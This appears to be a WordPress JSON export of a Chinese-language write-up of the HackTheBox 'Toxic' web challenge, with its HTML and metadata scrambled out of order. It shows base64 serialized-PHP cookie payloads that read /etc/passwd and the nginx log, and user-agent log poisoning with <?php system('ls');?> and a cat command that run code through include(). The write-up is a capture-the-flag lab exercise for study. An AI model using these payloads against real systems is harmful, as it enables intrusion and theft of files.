<\/p>\n\n\n\n
hackthebox\u4e0a\u7684web\u9776\u6a5f,\u540d\u7a31\u70ba <\/p>\n\n\n\n \u7528\u4efb\u610f\u6a94\u6848\u8b80\u53d6\u6f0f\u6d1e\u5b58\u53d6\u7cfb\u7d71\u65e5\u5fd7,\u5728\u5229\u7528\u4efb\u610f\u4ee3\u78bc\u57f7\u884c\u6f0f\u6d1e\u5728\u65e5\u5fd7\u5167\u7522\u751f\u6307\u4ee4\u8b93\u7cfb\u7d71\u57f7\u884c<\/p>\n\n\n\n <\/p>\n\n\n\n \u6839\u64daindex.php\u4ee3\u78bc\u5206\u6790,\u8b80\u6a94\u6703\u900f\u904ecookie\uff0c\u6240\u4ee5\u53ea\u8981\u6539cookie\u5c31\u53ef\u4ee5\u8b93\u7db2\u7ad9\u8b80\u53d6\u4efb\u610f\u6587\u6a94<\/p>\n\n\n\n \u5047\u5982\u6211\u60f3\u8b80\u53d6\/etc\/passwd, \u6211\u53ef\u4ee5\u7528\u4ee5\u4e0b\u4ee3\u78bc\u7522\u751fbase64\u7de8\u78bc\u7684Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoxMToiL2V0Yy9wYXNzd2QiO30=<\/p>\n\n\n\n Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoxMToiL2V0Yy9wYXNzd2QiO30=\u7528base64\u89e3\u958b\u5f8c\u6703\u5f97\u5230 <\/p>\n\n\n\n \u8b80\u53d6\u7db2\u9801\u6642\u5c07cookie\u5167\u5bb9\u6307\u5b9a\u70baTzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoxMToiL2V0Yy9wYXNzd2QiO30=\u6703\u8b93\u4ee3\u78bc\u8a8d\u70ba\u8981\u8b80\u53d6\/etc\/passwd,\u56e0\u6b64\u7db2\u9801\u6703\u986f\u793a\/etc\/passwd\u7684\u5167\u5bb9<\/p>\n\n\n\n <\/p>\n\n\n\n \u5206\u6790\u7d44\u614b\u6a94\u5167\u5bb9\u767c\u73fenginx.conf\u6709\/var\/log\/nginx\/access.log, \u56e0\u6b64\u53ef\u4ee5\u900f\u904e\u700f\u89bd\u884c\u70ba\u7522\u751f\u6307\u5b9a\u7684access log\u5167\u5bb9,\u6240\u4ee5\u7528\u525b\u525b\u7684\u6280\u5de7\u986f\u793a \u56e0\u6b64\u8981\u5c07cookie\u6307\u5b9a\u70baTzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoyNToiL3Zhci9sb2cvbmdpbngvYWNjZXNzLmxvZyI7fQ==,\u9019\u6bb5base64\u7de8\u78bc\u5167\u5bb9\u70ba \u53ea\u8981\u5728\u8acb\u6c42\u6642\u6307\u5b9a <\/p>\n\n\n\n \u7531\u65bc\u4ee3\u78bc\u4e2d\u4f7f\u7528 \u5728\u8acb\u6c42\u6642\u6307\u5b9a\u70ba \u4f46\u56e0\u70ba\u7d93\u904e\u4e86 \u900f\u904e\u9019\u500b\u65b9\u5f0f\u5c0b\u627e,\u53ef\u4ee5\u767c\u73feflag\u5728\u6839\u76ee\u9304,<\/p>\n\n\n\n \u56e0\u6b64\u6539\u70ba <\/p>\n\n\n\n \u53c3\u8003\u6587\u737b \u7528\u4efb\u610f\u6a94\u6848\u8b80\u53d6\u6f0f\u6d1e\u5b58\u53d6\u7cfb\u7d71\u65e5\u5fd7,\u5728\u5229\u7528\u4efb\u610f\u4ee3\u78bc\u57f7\u884c\u6f0f\u6d1e\u5728\u65e5\u5fd7\u5167\u7522\u751f\u6307\u4ee4\u8b93\u7cfb\u7d71\u57f7\u884c<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[27],"tags":[51,52],"class_list":["post-1027","post","type-post","status-publish","format-standard","hentry","category-hackerskill","tag-cookie","tag-log"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1027","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/comments?post=1027"}],"version-history":[{"count":0,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1027\/revisions"}],"wp:attachment":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media?parent=1027"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/categories?post=1027"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/tags?post=1027"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}toxic<\/code><\/p>\n\n\n\n\u653b\u64ca\u7b56\u7565: <\/h3>\n\n\n\n
\u5b89\u5168\u6aa2\u67e5\u91cd\u9ede<\/h3>\n\n\n\n
\n
\n\n\n\n\u653b\u64ca\u65b9\u5f0f<\/h2>\n\n\n\n
\u6b65\u9a5f1<\/h3>\n\n\n\n
<?php\nclass PageModel\n{\n public $file;\n}\n\n $page = new PageModel;\n $page->file = '\/etc\/passwd';\n print(base64_encode(serialize($page)))\n?>\n\n#php sandbox https:\/\/onlinephp.io\/<\/code><\/pre>\n\n\n\nO:9:\"PageModel\":1:{s:4:\"file\";s:11:\"\/etc\/passwd\";}<\/code><\/p>\n\n\n\n\u6b65\u9a5f2<\/h3>\n\n\n\n
\/var\/log\/nginx\/access.log<\/code><\/p>\n\n\n\nO:9:\"PageModel\":1:{s:4:\"file\";s:25:\"\/var\/log\/nginx\/access.log\";}<\/code>,\u9019\u6703\u8b93\u7db2\u9801\u986f\u793a\u5167\u5bb9\u5982\u4e0b<\/p>\n\n\n\n138.68.166.146 - 200 \"GET \/ HTTP\/1.1\" \"-\" \"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/114.0.0.0 Safari\/537.36\" \n138.68.166.146 - 200 \"GET \/favicon.ico HTTP\/1.1\" \"http:\/\/138.68.166.146:30307\/\" \"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/114.0.0.0 Safari\/537.36\" <\/code><\/pre>\n\n\n\nuser-agent:test<\/code>, \/var\/log\/nginx\/access.log<\/code>\u5167\u5bb9\u5c31\u6703\u7522\u751f\u8b8a\u6210\u4ee5\u4e0b\u9019\u6a23<\/p>\n\n\n\n138.68.166.146 - 200 \"GET \/ HTTP\/1.1\" \"-\" \"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/114.0.0.0 Safari\/537.36\" \n138.68.166.146 - 200 \"GET \/favicon.ico HTTP\/1.1\" \"http:\/\/138.68.166.146:30307\/\" \"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/114.0.0.0 Safari\/537.36\" \n138.68.166.146 - 200 \"GET \/ HTTP\/1.1\" \"-\" \"test\" 138.68.166.146 - 200 \"GET \/favicon.ico HTTP\/1.1\" \"http:\/\/138.68.166.146:30307\/\" \"test\"<\/code><\/pre>\n\n\n\n\u6b65\u9a5f3<\/h3>\n\n\n\n
include()<\/code>\u8b80\u53d6\u6587\u4ef6,\u6b64\u529f\u80fd\u7684\u7279\u9ede\u662f\u4efb\u4f55\u8b80\u53d6\u7684\u6587\u4ef6\u90fd\u6703\u88ab\u7576\u6210php\u57f7\u884c,\u6240\u4ee5\u6211\u5011\u53ef\u4ee5\u901a\u904e\u5c07shell\u5beb\u5165\u65e5\u5fd7\u7684\u65b9\u5f0f\u4f86\u57f7\u884c\u547d\u4ee4<\/p>\n\n\n\nuser-agent:<?php system('ls');?><\/code>,\u5728\/var\/log\/nginx\/access.log<\/code>\u5167\u5bb9\u5c31\u6703\u7522\u751f\u8b8a\u6210\u4ee5\u4e0b\u9019\u6a23<\/p>\n\n\n\n..omit...\n138.68.166.146 - 200 \"GET \/ HTTP\/1.1\" \"-\" \"test\" 138.68.166.146 - 200 \"GET \/favicon.ico HTTP\/1.1\" \"http:\/\/138.68.166.146:30307\/\" \"<?php system('ls');?>\"<\/code><\/pre>\n\n\n\ninclude( \"\/var\/log\/nginx\/access.log\")<\/code>\u9019\u500b\u529f\u80fd\u7684\u7279\u6027,\u6703\u57f7\u884c\u88e1\u9762\u7684system('ls')<\/code>,\u986f\u793als\u7684\u7d50\u679c,\u56e0\u6b64\u5be6\u969b\u7db2\u9801\u6703\u986f\u793a\u5982\u4e0b<\/p>\n\n\n\n...omit...\n138.68.166.146 - 200 \"GET \/ HTTP\/1.1\" \"-\" \"test\" 138.68.166.146 - 200 \"GET \/favicon.ico HTTP\/1.1\" \"http:\/\/138.68.166.146:30307\/\" models static index index.php <\/code><\/pre>\n\n\n\nuser-agent:<?php system('cat \/flag_TUJVt');?><\/code>,\u6216\u662f\u8acb\u6c42\u6642\u628acookie\u6307\u5b9aTzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoxMToiL2ZsYWdfVFVKVnQiO30= (\u6b64\u70ba \/flag_TUJVt\u7684\u4f4d\u7f6e) ,\u5c31\u53ef\u4ee5\u53d6\u5f97flag\u5167\u5bb9<\/p>\n\n\n\n
https:\/\/shakuganz.com\/2021\/05\/29\/hackthebox-toxic-write-up\/<\/a>
http:\/\/www.pdsdt.lovepdsdt.com\/index.php\/2021\/05\/01\/htb2\/<\/a>
http:\/\/www.bmth666.cn\/bmth_blog\/2020\/12\/31\/HackTheBox%E5%81%9A%E9%A2%98%E8%AE%B0%E5%BD%95\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"